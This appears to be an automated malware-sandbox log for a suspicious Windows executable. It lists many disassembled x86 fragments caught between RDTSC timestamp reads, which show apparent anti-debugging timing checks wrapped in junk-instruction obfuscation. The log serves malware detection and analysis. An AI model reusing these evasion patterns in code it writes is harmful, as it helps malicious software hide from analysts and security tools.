                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF13EE second address: AF1402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B534805Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF1402 second address: AF1406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF1406 second address: AF1460 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5348056h 0x00000008 jmp 00007FD0B5348064h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD0B5348066h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b pushad 0x0000001c jl 00007FD0B5348056h 0x00000022 jmp 00007FD0B5348066h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF1701 second address: AF1705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA537C second address: AA53E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B5348069h 0x00000008 jmp 00007FD0B5348068h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, 37250AE1h 0x00000018 mov ecx, dword ptr [ebp+122D2BACh] 0x0000001e mov ebx, dword ptr [ebp+12489547h] 0x00000024 mov dword ptr [ebp+122D17E2h], esi 0x0000002a add eax, ebx 0x0000002c mov dword ptr [ebp+1244DD8Bh], ebx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jbe 00007FD0B534805Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA53E0 second address: AA53E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA53E4 second address: AA5480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FD0B5348058h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push eax 0x00000027 movsx edi, bx 0x0000002a pop edi 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FD0B5348058h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov ecx, 7A4F079Ah 0x0000004c nop 0x0000004d jmp 00007FD0B5348065h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FD0B5348065h 0x0000005b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA5480 second address: AA549B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF183B second address: AF1840 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF5AAC second address: AF5AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF5AB0 second address: AF5AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF5AB4 second address: AF5ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF5ABA second address: AF5AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF5DD6 second address: AF5DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF60AA second address: AF60B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF61DE second address: AF61E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF61E6 second address: AF61F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF61F1 second address: AF61F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF61F7 second address: AF6213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348068h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF636C second address: AF6371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF6371 second address: AF639B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD0B5348056h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FD0B5348067h 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AFCFAC second address: AFCFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AFCFB2 second address: AFCFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AFE423 second address: AFE42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AFE9B2 second address: AFE9D4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FD0B5348062h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AFE9D4 second address: AFE9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AFE9D8 second address: AFE9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B02A72 second address: B02A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483378h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B02A8E second address: B02A98 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5348062h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B02BFF second address: B02C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FD0B5483371h 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0303D second address: B03069 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD0B534805Ch 0x00000011 js 00007FD0B5348056h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B03069 second address: B03092 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0B548337Eh 0x00000008 jmp 00007FD0B5483376h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B03200 second address: B0320A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0320A second address: B03214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD0B5483366h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B033A7 second address: B033AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B033AB second address: B033B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B033B1 second address: B033B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B033B7 second address: B033BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B033BC second address: B033C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B033C2 second address: B033C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0353D second address: B0356F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B534805Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 jns 00007FD0B5348056h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b jc 00007FD0B534806Bh 0x00000021 jmp 00007FD0B534805Fh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B036CF second address: B036D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B036D7 second address: B036DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B036DB second address: B036EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B085DC second address: B08602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD0B5348056h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FD0B5348067h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B08602 second address: B0862D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FD0B548336Ah 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD0B5483373h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0862D second address: B08632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A60CBA second address: A60CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B5483376h 0x00000009 popad 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A60CD5 second address: A60CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD0B534805Ch 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A60CE7 second address: A60CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B10405 second address: B10429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0B5348056h 0x0000000a jmp 00007FD0B5348069h 0x0000000f popad 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B10429 second address: B10452 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD0B548336Bh 0x00000008 jmp 00007FD0B5483374h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B10452 second address: B10456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B10456 second address: B1045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B1045A second address: B10469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B10469 second address: B10473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD0B5483366h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E736 second address: B0E73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E73C second address: B0E742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E742 second address: B0E746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E746 second address: B0E763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FD0B5483366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FD0B548336Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E763 second address: B0E767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E767 second address: B0E76B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0EC02 second address: B0EC0C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD0B5348062h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0EC0C second address: B0EC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0EC12 second address: B0EC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 jg 00007FD0B5348056h 0x0000000e jmp 00007FD0B534805Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0EC2D second address: B0EC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0B5483366h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0ED96 second address: B0ED9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0EFFD second address: B0F003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0F003 second address: B0F00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0F00B second address: B0F036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD0B5483366h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B5483370h 0x00000012 jmp 00007FD0B548336Eh 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0F18B second address: B0F191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0F191 second address: B0F1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B5483379h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0F1AE second address: B0F1B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0F34B second address: B0F356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0F493 second address: B0F4A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD0B534805Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0FBBD second address: B0FBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E1DF second address: B0E1E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E1E4 second address: B0E1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B0E1EC second address: B0E1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B175E0 second address: B175E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B234B1 second address: B234D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD0B5348056h 0x0000000a popad 0x0000000b push esi 0x0000000c jnl 00007FD0B5348056h 0x00000012 jmp 00007FD0B534805Ah 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B388A3 second address: B388A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B388A7 second address: B388AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B388AD second address: B388BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FD0B5483366h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B3C843 second address: B3C866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B5348060h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B3C866 second address: B3C87A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0B5483366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B425A4 second address: B425AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B40E4F second address: B40E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B40E54 second address: B40E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B4184D second address: B41853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B41853 second address: B41860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007FD0B534805Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B44F34 second address: B44F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
